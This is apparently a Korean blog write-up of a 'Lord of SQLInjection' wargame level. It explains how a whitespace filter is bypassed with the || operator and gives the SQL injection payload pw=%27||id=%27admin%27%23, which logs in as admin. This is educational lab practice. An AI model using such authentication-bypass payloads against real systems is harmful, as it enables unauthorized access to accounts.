query와 코드를 보니 id는 guest로 고정되어 있고 이걸 admin으로 바꾸면 풀리는 문제인 것 같다.
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
이 코드를 보지 못하고 pw=0' or id='admin'%23 이렇게 했더니 바로 No whitespace가 뜬다.
공백을 빼야하는 코드이다.
그러므로 띄어쓰기가 필요 없는 or을 대체해줄 수 있는 || 연산자를 포함시켜 문제를 해결했다.
답 : pw=%27||id=%27admin%27%23
'Wargame > Lord of SQLInjection' 카테고리의 다른 글
| Lord of SQLInjection 8번 troll (0) | 2021.12.14 |
|---|---|
| Lord of SQLInjection 7번 orge (0) | 2021.12.14 |
| Lord of SQLInjection 6번 darkelf (0) | 2021.12.13 |
| Lord of SQLInjection 4번 orc (0) | 2021.12.13 |
| Lord of SQLInjection 3번 goblin (0) | 2021.12.13 |
